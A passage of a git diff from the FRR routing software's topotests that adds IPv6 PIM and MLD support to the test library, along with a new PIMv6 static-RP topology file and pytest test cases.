+ config_data.append(cmd)
+
+ if source and join:
+ for group in join:
+ cmd = "ipv6 {} join {} {}".format(protocol, group, source)
+
+ if del_attr:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+
+ elif join:
+ for group in join:
+ cmd = "ipv6 {} join {}".format(protocol, group)
+
+ if del_attr:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+
+ if query:
+ for _query, value in query.items():
+ if _query != "delete":
+ cmd = "ipv6 {} {} {}".format(protocol, _query, value)
+
+ if "delete" in intf_data[intf_name][protocol]["query"]:
+ cmd = "no {}".format(cmd)
+
+ config_data.append(cmd)
+ try:
+ result = create_common_configuration(
+ tgen, router, config_data, "interface_config", build=build
+ )
+ except InvalidCLIError:
+ errormsg = traceback.format_exc()
+ logger.error(errormsg)
+ return errormsg
+
+ logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
+ return result
+
+
def _enable_disable_pim_config(tgen, topo, input_dict, router, build=False):
"""
Helper API to enable or disable pim on interfaces
@@ -338,7 +502,7 @@ def _enable_disable_pim_config(tgen, topo, input_dict, router, build=False):
config_data = []
- # Enable pim on interfaces
+ # Enable pim/pim6 on interfaces
for destRouterLink, data in sorted(topo[router]["links"].items()):
if "pim" in data and data["pim"] == "enable":
# Loopback interfaces
@@ -351,6 +515,17 @@ def _enable_disable_pim_config(tgen, topo, input_dict, router, build=False):
config_data.append(cmd)
config_data.append("ip pim")
+ if "pim6" in data and data["pim6"] == "enable":
+ # Loopback interfaces
+ if "type" in data and data["type"] == "loopback":
+ interface_name = destRouterLink
+ else:
+ interface_name = data["interface"]
+
+ cmd = "interface {}".format(interface_name)
+ config_data.append(cmd)
+ config_data.append("ipv6 pim")
+
# pim global config
if "pim" in input_dict[router]:
pim_data = input_dict[router]["pim"]
@@ -366,6 +541,21 @@ def _enable_disable_pim_config(tgen, topo, input_dict, router, build=False):
cmd = "no {}".format(cmd)
config_data.append(cmd)
+ # pim6 global config
+ if "pim6" in input_dict[router]:
+ pim6_data = input_dict[router]["pim6"]
+ del_action = pim6_data.setdefault("delete", False)
+ for t in [
+ "join-prune-interval",
+ "keep-alive-timer",
+ "register-suppress-time",
+ ]:
+ if t in pim6_data:
+ cmd = "ipv6 pim {} {}".format(t, pim6_data[t])
+ if del_action:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+
return config_data
@@ -732,9 +922,6 @@ def verify_upstream_iif(
"[DUT: %s]: Verifying upstream Inbound Interface" " for IGMP groups received:",
dut,
)
- show_ip_pim_upstream_json = run_frr_cmd(
- rnode, "show ip pim upstream json", isjson=True
- )
if type(group_addresses) is not list:
group_addresses = [group_addresses]
@@ -742,6 +929,17 @@ def verify_upstream_iif(
if type(iif) is not list:
iif = [iif]
+ for grp in group_addresses:
+ addr_type = validate_ip_address(grp)
+
+ if addr_type == "ipv4":
+ ip_cmd = "ip"
+ elif addr_type == "ipv6":
+ ip_cmd = "ipv6"
+
+ cmd = "show {} pim upstream json".format(ip_cmd)
+ show_ip_pim_upstream_json = run_frr_cmd(rnode, cmd, isjson=True)
+
for grp_addr in group_addresses:
# Verify group address
if grp_addr not in show_ip_pim_upstream_json:
@@ -883,13 +1081,19 @@ def verify_join_state_and_timer(
"[DUT: %s]: Verifying Join state and Join Timer" " for IGMP groups received:",
dut,
)
- show_ip_pim_upstream_json = run_frr_cmd(
- rnode, "show ip pim upstream json", isjson=True
- )
if type(group_addresses) is not list:
group_addresses = [group_addresses]
+ for grp in group_addresses:
+ addr_type = validate_ip_address(grp)
+
+ if addr_type == "ipv4":
+ cmd = "show ip pim upstream json"
+ elif addr_type == "ipv6":
+ cmd = "show ipv6 pim upstream json"
+ show_ip_pim_upstream_json = run_frr_cmd(rnode, cmd, isjson=True)
+
for grp_addr in group_addresses:
# Verify group address
if grp_addr not in show_ip_pim_upstream_json:
@@ -1010,12 +1214,31 @@ def verify_mroutes(
rnode = tgen.routers()[dut]
+ if not isinstance(group_addresses, list):
+ group_addresses = [group_addresses]
+
+ if not isinstance(iif, list) and iif != "none":
+ iif = [iif]
+
+ if not isinstance(oil, list) and oil != "none":
+ oil = [oil]
+
+ for grp in group_addresses:
+ addr_type = validate_ip_address(grp)
+
+ if addr_type == "ipv4":
+ ip_cmd = "ip"
+ elif addr_type == "ipv6":
+ ip_cmd = "ipv6"
+
if return_uptime:
logger.info("Sleeping for %s sec..", mwait)
sleep(mwait)
logger.info("[DUT: %s]: Verifying ip mroutes", dut)
- show_ip_mroute_json = run_frr_cmd(rnode, "show ip mroute json", isjson=True)
+ show_ip_mroute_json = run_frr_cmd(
+ rnode, "show {} mroute json".format(ip_cmd), isjson=True
+ )
if return_uptime:
uptime_dict = {}
@@ -1024,15 +1247,6 @@ def verify_mroutes(
error_msg = "[DUT %s]: mroutes are not present or flushed out !!" % (dut)
return error_msg
- if not isinstance(group_addresses, list):
- group_addresses = [group_addresses]
-
- if not isinstance(iif, list) and iif != "none":
- iif = [iif]
-
- if not isinstance(oil, list) and oil != "none":
- oil = [oil]
-
for grp_addr in group_addresses:
if grp_addr not in show_ip_mroute_json:
errormsg = "[DUT %s]: Verifying (%s, %s) mroute," "[FAILED]!! " % (
@@ -1214,15 +1428,20 @@ def verify_pim_rp_info(
rnode = tgen.routers()[dut]
- logger.info("[DUT: %s]: Verifying ip rp info", dut)
- show_ip_rp_info_json = run_frr_cmd(rnode, "show ip pim rp-info json", isjson=True)
-
if type(group_addresses) is not list:
group_addresses = [group_addresses]
if type(oif) is not list:
oif = [oif]
+ for grp in group_addresses:
+ addr_type = validate_ip_address(grp)
+
+ if addr_type == "ipv4":
+ ip_cmd = "ip"
+ elif addr_type == "ipv6":
+ ip_cmd = "ipv6"
+
for grp_addr in group_addresses:
if rp is None:
rp_details = find_rp_details(tgen, topo)
@@ -1232,9 +1451,14 @@ def verify_pim_rp_info(
else:
iamRP = False
else:
- show_ip_route_json = run_frr_cmd(
- rnode, "show ip route connected json", isjson=True
- )
+ if addr_type == "ipv4":
+ show_ip_route_json = run_frr_cmd(
+ rnode, "show ip route connected json", isjson=True
+ )
+ elif addr_type == "ipv6":
+ show_ip_route_json = run_frr_cmd(
+ rnode, "show ipv6 route connected json", isjson=True
+ )
for _rp in show_ip_route_json.keys():
if rp == _rp.split("/")[0]:
iamRP = True
@@ -1242,16 +1466,27 @@ def verify_pim_rp_info(
else:
iamRP = False
+ logger.info("[DUT: %s]: Verifying ip rp info", dut)
+ cmd = "show {} pim rp-info json".format(ip_cmd)
+ show_ip_rp_info_json = run_frr_cmd(rnode, cmd, isjson=True)
+
if rp not in show_ip_rp_info_json:
- errormsg = "[DUT %s]: Verifying rp-info" "for rp_address %s [FAILED]!! " % (
- dut,
- rp,
+ errormsg = (
+ "[DUT %s]: Verifying rp-info "
+ "for rp_address %s [FAILED]!! " % (dut, rp)
)
return errormsg
else:
group_addr_json = show_ip_rp_info_json[rp]
for rp_json in group_addr_json:
+ if "rpAddress" not in rp_json:
+ errormsg = "[DUT %s]: %s key not " "present in rp-info " % (
+ dut,
+ "rpAddress",
+ )
+ return errormsg
+
if oif is not None:
found = False
if rp_json["outboundInterface"] not in oif:
@@ -1380,14 +1615,26 @@ def verify_pim_state(
rnode = tgen.routers()[dut]
logger.info("[DUT: %s]: Verifying pim state", dut)
- show_pim_state_json = run_frr_cmd(rnode, "show ip pim state json", isjson=True)
-
- if installed_fl is None:
- installed_fl = 1
if type(group_addresses) is not list:
group_addresses = [group_addresses]
+ for grp in group_addresses:
+ addr_type = validate_ip_address(grp)
+
+ if addr_type == "ipv4":
+ ip_cmd = "ip"
+ elif addr_type == "ipv6":
+ ip_cmd = "ipv6"
+
+ logger.info("[DUT: %s]: Verifying pim state", dut)
+ show_pim_state_json = run_frr_cmd(
+ rnode, "show {} pim state json".format(ip_cmd), isjson=True
+ )
+
+ if installed_fl is None:
+ installed_fl = 1
+
for grp_addr in group_addresses:
if src_address is None:
src_address = "*"
@@ -3635,7 +3882,7 @@ def verify_local_igmp_groups(tgen, dut, interface, group_addresses):
return True
-def verify_pim_interface_traffic(tgen, input_dict, return_stats=True):
+def verify_pim_interface_traffic(tgen, input_dict, return_stats=True, addr_type="ipv4"):
"""
Verify ip pim interface traffice by running
"show ip pim interface traffic" cli
@@ -3645,6 +3892,8 @@ def verify_pim_interface_traffic(tgen, input_dict, return_stats=True):
* `tgen`: topogen object
* `input_dict(dict)`: defines DUT, what and from which interfaces
traffic needs to be verified
+ * [optional]`addr_type`: specify address-family, default is ipv4
+
Usage
-----
input_dict = {
@@ -3675,9 +3924,13 @@ def verify_pim_interface_traffic(tgen, input_dict, return_stats=True):
rnode = tgen.routers()[dut]
logger.info("[DUT: %s]: Verifying pim interface traffic", dut)
- show_pim_intf_traffic_json = run_frr_cmd(
- rnode, "show ip pim interface traffic json", isjson=True
- )
+
+ if addr_type == "ipv4":
+ cmd = "show ip pim interface traffic json"
+ elif addr_type == "ipv6":
+ cmd = "show ipv6 pim interface traffic json"
+
+ show_pim_intf_traffic_json = run_frr_cmd(rnode, cmd, isjson=True)
output_dict[dut] = {}
for intf, data in input_dict[dut].items():
diff --git a/tests/topotests/lib/topogen.py b/tests/topotests/lib/topogen.py
index c04506f47e..c51a187f28 100644
--- a/tests/topotests/lib/topogen.py
+++ b/tests/topotests/lib/topogen.py
@@ -725,6 +725,7 @@ class TopoRouter(TopoGear):
RD_PBRD = 16
RD_PATH = 17
RD_SNMP = 18
+ RD_PIM6 = 19
RD = {
RD_FRR: "frr",
RD_ZEBRA: "zebra",
@@ -735,6 +736,7 @@ class TopoRouter(TopoGear):
RD_ISIS: "isisd",
RD_BGP: "bgpd",
RD_PIM: "pimd",
+ RD_PIM6: "pim6d",
RD_LDP: "ldpd",
RD_EIGRP: "eigrpd",
RD_NHRP: "nhrpd",
@@ -820,7 +822,8 @@ class TopoRouter(TopoGear):
Possible daemon values are: TopoRouter.RD_ZEBRA, TopoRouter.RD_RIP,
TopoRouter.RD_RIPNG, TopoRouter.RD_OSPF, TopoRouter.RD_OSPF6,
TopoRouter.RD_ISIS, TopoRouter.RD_BGP, TopoRouter.RD_LDP,
- TopoRouter.RD_PIM, TopoRouter.RD_PBR, TopoRouter.RD_SNMP.
+ TopoRouter.RD_PIM, TopoRouter.RD_PIM6, TopoRouter.RD_PBR,
+ TopoRouter.RD_SNMP.
Possible `source` values are `None` for an empty config file, a path name which is
used directly, or a file name with no path components which is first looked for
@@ -1276,6 +1279,7 @@ def diagnose_env_linux(rundir):
"ripngd",
"isisd",
"pimd",
+ "pim6d",
"ldpd",
"pbrd",
]:
diff --git a/tests/topotests/lib/topojson.py b/tests/topotests/lib/topojson.py
index 3ca3353ed3..b49b09e636 100644
--- a/tests/topotests/lib/topojson.py
+++ b/tests/topotests/lib/topojson.py
@@ -41,7 +41,11 @@ from lib.common_config import (
number_to_column,
)
from lib.ospf import create_router_ospf
-from lib.pim import create_igmp_config, create_pim_config
+from lib.pim import (
+ create_igmp_config,
+ create_pim_config,
+ create_mld_config,
+)
from lib.topolog import logger
@@ -332,6 +336,7 @@ def build_config_from_json(tgen, topo=None, save_bkup=True):
("route_maps", create_route_maps),
("pim", create_pim_config),
("igmp", create_igmp_config),
+ ("mld", create_mld_config),
("bgp", create_router_bgp),
("ospf", create_router_ospf),
]
@@ -352,7 +357,9 @@ def build_config_from_json(tgen, topo=None, save_bkup=True):
logger.info("build_config_from_json: failed to configure topology")
pytest.exit(1)
- logger.info("Built config now clearing ospf neighbors as that router-id might not be what is used")
+ logger.info(
+ "Built config now clearing ospf neighbors as that router-id might not be what is used"
+ )
for ospf in ["ospf", "ospf6"]:
for router in data:
if ospf not in data[router]:
diff --git a/tests/topotests/lib/topotest.py b/tests/topotests/lib/topotest.py
index 27b566a8f5..5a3f586f82 100644
--- a/tests/topotests/lib/topotest.py
+++ b/tests/topotests/lib/topotest.py
@@ -1330,6 +1330,7 @@ class Router(Node):
"isisd": 0,
"bgpd": 0,
"pimd": 0,
+ "pim6d": 0,
"ldpd": 0,
"eigrpd": 0,
"nhrpd": 0,
diff --git a/tests/topotests/multicast_pim_static_rp_topo1/multicast_pimv6_static_rp.json b/tests/topotests/multicast_pim_static_rp_topo1/multicast_pimv6_static_rp.json
new file mode 100644
index 0000000000..9edfae4a24
--- /dev/null
+++ b/tests/topotests/multicast_pim_static_rp_topo1/multicast_pimv6_static_rp.json
@@ -0,0 +1,197 @@
+{
+ "address_types": ["ipv6"],
+ "ipv6base": "fd00::",
+ "ipv6mask": 64,
+ "link_ip_start": {
+ "ipv6": "fd00::",
+ "v6mask": 64
+ },
+ "lo_prefix": {
+ "ipv6": "2001:db8:f::",
+ "v6mask": 128
+ },
+ "routers": {
+ "r0": {
+ "links": {
+ "r1": {"ipv6": "auto"}
+ }
+ },
+ "r1": {
+ "links": {
+ "lo": {"ipv6": "auto", "type": "loopback", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r0": {"ipv6": "auto", "pim6": "enable"},
+ "r2": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r3": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r4": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }}
+ },
+ "ospf6": {
+ "router_id": "100.1.1.0",
+ "neighbors": {
+ "r2": {},
+ "r3": {},
+ "r4": {}
+ },
+ "redistribute": [
+ {
+ "redist_type": "static"
+ },
+ {
+ "redist_type": "connected"
+ }
+ ]
+ },
+ "mld": {
+ "interfaces": {
+ "r1-r0-eth0" :{
+ "mld":{
+ }
+ }
+ }
+ }
+ },
+ "r2": {
+ "links": {
+ "lo": {"ipv6": "auto", "type": "loopback", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r1": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r3": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }}
+ },
+ "ospf6": {
+ "router_id": "100.1.1.1",
+ "neighbors": {
+ "r1": {},
+ "r3": {}
+ },
+ "redistribute": [
+ {
+ "redist_type": "static"
+ },
+ {
+ "redist_type": "connected"
+ }
+ ]
+ }
+ },
+ "r3": {
+ "links": {
+ "lo": {"ipv6": "auto", "type": "loopback", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r1": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r2": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r4": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r5": {"ipv6": "auto", "pim6": "enable"}
+ },
+ "ospf6": {
+ "router_id": "100.1.1.2",
+ "neighbors": {
+ "r1": {},
+ "r2": {},
+ "r4": {}
+ },
+ "redistribute": [
+ {
+ "redist_type": "static"
+ },
+ {
+ "redist_type": "connected"
+ }
+ ]
+ }
+ },
+ "r4": {
+ "links": {
+ "lo": {"ipv6": "auto", "type": "loopback", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r1": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }},
+ "r3": {"ipv6": "auto", "pim6": "enable",
+ "ospf6": {
+ "area": "0.0.0.0",
+ "hello_interval": 1,
+ "dead_interval": 4
+ }}
+ },
+ "ospf6": {
+ "router_id": "100.1.1.3",
+ "neighbors": {
+ "r1": {},
+ "r3": {}
+ },
+ "redistribute": [
+ {
+ "redist_type": "static"
+ },
+ {
+ "redist_type": "connected"
+ }
+ ]
+ }
+ },
+ "r5": {
+ "links": {
+ "r3": {"ipv6": "auto"}
+ }
+ }
+ }
+}
diff --git a/tests/topotests/multicast_pim_static_rp_topo1/test_multicast_pimv6_static_rp.py b/tests/topotests/multicast_pim_static_rp_topo1/test_multicast_pimv6_static_rp.py
new file mode 100755
index 0000000000..bd5473a511
--- /dev/null
+++ b/tests/topotests/multicast_pim_static_rp_topo1/test_multicast_pimv6_static_rp.py
@@ -0,0 +1,414 @@
+#!/usr/bin/env python
+
+#
+# Copyright (c) 2022 by VMware, Inc. ("VMware")
+# Used Copyright (c) 2018 by Network Device Education Foundation,
+# Inc. ("NetDEF") in this file.
+#
+# Permission to use, copy, modify, and/or distribute this software
+# for any purpose with or without fee is hereby granted, provided
+# that the above copyright notice and this permission notice appear
+# in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND VMWARE DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL VMWARE BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
+# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
+# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
+# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
+# OF THIS SOFTWARE.
+#
+
+"""
+Following tests are covered to test Multicast basic functionality:
+
+Topology:
+
+ _______r2_____
+ | |
+ iperf | | iperf
+ r0-----r1-------------r3-----r5
+ | |
+ |_____________|
+ r4
+
+Test steps
+- Create topology (setup module)
+- Bring up topology
+
+TC_1 : Verify upstream interfaces (IIF) and join state are updated properly
+ after adding and deleting the static RP
+TC_2 : Verify IIF and OIL in "show ip pim state" are updated properly after
+    adding and deleting the static RP
+TC_3: (*, G) Mroute entries are cleared when the static RP gets deleted
+TC_4: Verify (*,G) prune is sent towards the RP after deleting the static RP
+TC_24 : Verify (*,G) and (S,G) are populated correctly when SPT and RPT share the
+ same path
+"""
+
+import os
+import sys
+import json
+import time
+import pytest
+from time import sleep
+import datetime
+
+# Save the Current Working Directory to find configuration files.
+CWD = os.path.dirname(os.path.realpath(__file__))
+sys.path.append(os.path.join(CWD, "../"))
+sys.path.append(os.path.join(CWD, "../lib/"))
+
+# Required to instantiate the topology builder class.
+
+# pylint: disable=C0413
+# Import topogen and topotest helpers
+from lib.topogen import Topogen, get_topogen
+
+from lib.common_config import (
+ start_topology,
+ write_test_header,
+ write_test_footer,
+ reset_config_on_routers,
+ step,
+ shutdown_bringup_interface,
+ kill_router_daemons,
+ start_router_daemons,
+ create_static_routes,
+ check_router_status,
+ socat_send_igmp_join_traffic,
+ topo_daemons
+)
+from lib.pim import (
+ create_pim_config,
+ verify_igmp_groups,
+ verify_upstream_iif,
+ verify_join_state_and_timer,
+ verify_mroutes,
+ verify_pim_neighbors,
+ verify_pim_interface_traffic,
+ verify_pim_rp_info,
+ verify_pim_state,
+ clear_pim_interface_traffic,
+ clear_igmp_interfaces,
+ clear_pim_interfaces,
+ clear_mroute,
+ clear_mroute_verify,
+)
+from lib.topolog import logger
+from lib.topojson import build_topo_from_json, build_config_from_json
+
+# Global variables
+GROUP_RANGE_V6 = "ff08::/64"
+IGMP_JOIN_V6 = "ff08::1"
+STAR = "*"
+SOURCE = "Static"
+
+pytestmark = [pytest.mark.pimd]
+
+
+def build_topo(tgen):
+ """Build function"""
+
+ # Building topology from json file
+ build_topo_from_json(tgen, TOPO)
+
+
+def setup_module(mod):
+ """
+ Sets up the pytest environment
+
+ * `mod`: module name
+ """
+
+ testsuite_run_time = time.asctime(time.localtime(time.time()))
+ logger.info("Testsuite start time: %s", testsuite_run_time)
+ logger.info("=" * 40)
+
+ topology = """
+
+ _______r2_____
+ | |
+ iperf | | iperf
+ r0-----r1-------------r3-----r5
+ | |
+ |_____________|
+ r4
+
+ """
+ logger.info("Master Topology: \n %s", topology)
+
+ logger.info("Running setup_module to create topology")
+
+ # This function initiates the topology build with Topogen...
+ json_file = "{}/multicast_pimv6_static_rp.json".format(CWD)
+ tgen = Topogen(json_file, mod.__name__)
+ global TOPO
+ TOPO = tgen.json_topo
+
+ # ... and here it calls Mininet initialization functions.
+
+ # get list of daemons needs to be started for this suite.
+ daemons = topo_daemons(tgen, TOPO)
+
+ # Starting topology, create tmp files which are loaded to routers
+ # to start daemons and then start routers
+ start_topology(tgen, daemons)
+
+ # Don"t run this test if we have any failure.
+ if tgen.routers_have_failure():
+ pytest.skip(tgen.errors)
+
+ # Creating configuration from JSON
+ build_config_from_json(tgen, TOPO)
+
+ # Verify PIM neighbors
+ result = verify_pim_neighbors(tgen, TOPO)
+ assert result is True, "setup_module :Failed \n Error:" " {}".format(result)
+
+ logger.info("Running setup_module() done")
+
+
+def teardown_module():
+ """Teardown the pytest environment"""
+
+ logger.info("Running teardown_module to delete topology")
+ tgen = get_topogen()
+
+    # Stop topology and remove tmp files
+ tgen.stop_topology()
+
+ logger.info("Testsuite end time: %s", time.asctime(time.localtime(time.time())))
+ logger.info("=" * 40)
+
+
+#####################################################
+#
+# Testcases
+#
+#####################################################
+
+
+def verify_state_incremented(state_before, state_after):
+ """
+ API to compare interface traffic state incrementing
+
+ Parameters
+ ----------
+ * `state_before` : State dictionary for any particular instance
+ * `state_after` : State dictionary for any particular instance
+ """
+
+ for router, state_data in state_before.items():
+ for state, value in state_data.items():
+ if state_before[router][state] >= state_after[router][state]:
+ errormsg = (
+ "[DUT: %s]: state %s value has not"
+ " incremented, Initial value: %s, "
+ "Current value: %s [FAILED!!]"
+ % (
+ router,
+ state,
+ state_before[router][state],
+ state_after[router][state],
+ )
+ )
+ return errormsg
+
+ logger.info(
+ "[DUT: %s]: State %s value is "
+ "incremented, Initial value: %s, Current value: %s"
+ " [PASSED!!]",
+ router,
+ state,
+ state_before[router][state],
+ state_after[router][state],
+ )
+
+ return True
+
+
+#####################################################
+
+def test_pimv6_add_delete_static_RP_p0(request):
+ """
+    TC_1: Verify upstream interfaces (IIF) and join state are updated
+ properly after adding and deleting the static RP
+    TC_2: Verify IIF and OIL in "show ip pim state" are updated properly
+        after adding and deleting the static RP
+    TC_3: (*, G) Mroute entries are cleared when the static RP gets deleted
+    TC_4: Verify (*,G) prune is sent towards the RP after deleting the
+ static RP
+
+    Topology used:
+ r0------r1-----r2
+ iperf DUT RP
+ """
+
+ tgen = get_topogen()
+ tc_name = request.node.name
+ write_test_header(tc_name)
+
+ # Don"t run this test if we have any failure.
+ if tgen.routers_have_failure():
+ check_router_status(tgen)
+
+ step("Shut link b/w R1 and R3 and R1 and R4 as per tescase topology")
+ intf_r1_r3 = TOPO["routers"]["r1"]["links"]["r3"]["interface"]
+ intf_r1_r4 = TOPO["routers"]["r1"]["links"]["r4"]["interface"]
+ for intf in [intf_r1_r3, intf_r1_r4]:
+ shutdown_bringup_interface(tgen, "r1", intf, ifaceaction=False)
+
+ step("Enable PIM between r1 and r2")
+ step("Enable MLD on r1 interface and send IGMP " "join (FF08::1) to r1")
+ step("Configure r2 loopback interface as RP")
+ input_dict = {
+ "r2": {
+ "pim6": {
+ "rp": [
+ {
+ "rp_addr": TOPO["routers"]["r2"]["links"]["lo"]["ipv6"].split(
+ "/"
+ )[0],
+ "group_addr_range": GROUP_RANGE_V6,
+ }
+ ]
+ }
+ }
+ }
+
+ result = create_pim_config(tgen, TOPO, input_dict)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Verify show ip pim interface traffic without any mld join")
+ state_dict = {
+ "r1": {TOPO["routers"]["r1"]["links"]["r2"]["interface"]: ["pruneTx"]}
+ }
+
+ state_before = verify_pim_interface_traffic(tgen, state_dict, addr_type="ipv6")
+ assert isinstance(
+ state_before, dict
+ ), "Testcase{} : Failed \n state_before is not dictionary \n " "Error: {}".format(
+ tc_name, result
+ )
+
+ step("send mld join (FF08::1) to R1")
+ intf = TOPO["routers"]["r0"]["links"]["r1"]["interface"]
+ intf_ip = TOPO["routers"]["r0"]["links"]["r1"]["ipv6"].split("/")[0]
+ result = socat_send_igmp_join_traffic(
+ tgen, "r0", "UDP6-RECV", IGMP_JOIN_V6, intf, intf_ip, join=True
+ )
+ assert result is True, "Testcase {}: Failed Error: {}".format(tc_name, result)
+
+ step("r1: Verify RP info")
+ dut = "r1"
+ oif = TOPO["routers"]["r1"]["links"]["r2"]["interface"]
+ iif = TOPO["routers"]["r1"]["links"]["r0"]["interface"]
+ rp_address = TOPO["routers"]["r2"]["links"]["lo"]["ipv6"].split("/")[0]
+ result = verify_pim_rp_info(
+ tgen, TOPO, dut, GROUP_RANGE_V6, oif, rp_address, SOURCE
+ )
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
+
+ step("r1: Verify upstream IIF interface")
+ result = verify_upstream_iif(tgen, dut, oif, STAR, IGMP_JOIN_V6)
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
+
+ step("r1: Verify upstream join state and join timer")
+ result = verify_join_state_and_timer(tgen, dut, oif, STAR, IGMP_JOIN_V6)
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
+
+ step("r1: Verify PIM state")
+ result = verify_pim_state(tgen, dut, oif, iif, IGMP_JOIN_V6)
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
+
+ step("r1: Verify ip mroutes")
+ result = verify_mroutes(tgen, dut, STAR, IGMP_JOIN_V6, oif, iif)
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
+
+ step("r1: Delete RP configuration")
+ input_dict = {
+ "r2": {
+ "pim6": {
+ "rp": [
+ {
+ "rp_addr": TOPO["routers"]["r2"]["links"]["lo"]["ipv6"].split(
+ "/"
+ )[0],
+ "group_addr_range": GROUP_RANGE_V6,
+ "delete": True,
+ }
+ ]
+ }
+ }
+ }
+
+ result = create_pim_config(tgen, TOPO, input_dict)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("r1: Verify RP info")
+ result = verify_pim_rp_info(
+ tgen, TOPO, dut, GROUP_RANGE_V6, oif, rp_address, SOURCE, expected=False
+ )
+ assert (
+ result is not True
+ ), "Testcase {} :Failed \n " "RP: {} info is still present \n Error: {}".format(
+ tc_name, rp_address, result
+ )
+
+ step("r1: Verify upstream IIF interface")
+ result = verify_upstream_iif(tgen, dut, oif, STAR, IGMP_JOIN_V6, expected=False)
+ assert result is not True, (
+ "Testcase {} :Failed \n "
+ "Upstream ({}, {}) is still in join state \n Error: {}".format(
+ tc_name, STAR, IGMP_JOIN_V6, result
+ )
+ )
+
+ step("r1: Verify upstream join state and join timer")
+ result = verify_join_state_and_timer(
+ tgen, dut, oif, STAR, IGMP_JOIN_V6, expected=False
+ )
+ assert result is not True, (
+ "Testcase {} :Failed \n "
+ "Upstream ({}, {}) timer is still running \n Error: {}".format(
+ tc_name, STAR, IGMP_JOIN_V6, result
+ )
+ )
+
+ step("r1: Verify PIM state")
+ result = verify_pim_state(tgen, dut, oif, iif, IGMP_JOIN_V6, expected=False)
+ assert result is not True, (
+ "Testcase {} :Failed \n "
+ "PIM state for group: {} is still Active \n Error: {}".format(
+ tc_name, IGMP_JOIN_V6, result
+ )
+ )
+
+ step("r1: Verify ip mroutes")
+ result = verify_mroutes(tgen, dut, STAR, IGMP_JOIN_V6, oif, iif, expected=False)
+ assert result is not True, (
+ "Testcase {} :Failed \n "
+ "mroute ({}, {}) is still present \n Error: {}".format(
+ tc_name, STAR, IGMP_JOIN_V6, result
+ )
+ )
+
+ step("r1: Verify show ip pim interface traffic without any IGMP join")
+ state_after = verify_pim_interface_traffic(tgen, state_dict, addr_type="ipv6")
+ assert isinstance(
+ state_after, dict
+ ), "Testcase{} : Failed \n state_before is not dictionary \n " "Error: {}".format(
+ tc_name, result
+ )
+
+ result = verify_state_incremented(state_before, state_after)
+ assert result is True, "Testcase{} : Failed Error: {}".format(tc_name, result)
+
+ write_test_footer(tc_name)
+
+
+if __name__ == "__main__":
+ args = ["-s"] + sys.argv[1:]
+ sys.exit(pytest.main(args))
diff --git a/tests/topotests/ospf_gr_helper/test_ospf_gr_helper1.py b/tests/topotests/ospf_gr_helper/test_ospf_gr_helper1.py
index 8c855620be..58d37a368c 100644
--- a/tests/topotests/ospf_gr_helper/test_ospf_gr_helper1.py
+++ b/tests/topotests/ospf_gr_helper/test_ospf_gr_helper1.py
@@ -57,6 +57,8 @@ from lib.ospf import (
create_router_ospf,
)
+pytestmark = [pytest.mark.ospfd]
+
# Global variables
topo = None
Iters = 5
diff --git a/tests/topotests/ospf_gr_helper/test_ospf_gr_helper2.py b/tests/topotests/ospf_gr_helper/test_ospf_gr_helper2.py
index e7d0621df8..85646a8fab 100644
--- a/tests/topotests/ospf_gr_helper/test_ospf_gr_helper2.py
+++ b/tests/topotests/ospf_gr_helper/test_ospf_gr_helper2.py
@@ -57,6 +57,8 @@ from lib.ospf import (
create_router_ospf,
)
+pytestmark = [pytest.mark.ospfd]
+
# Global variables
topo = None
Iters = 5
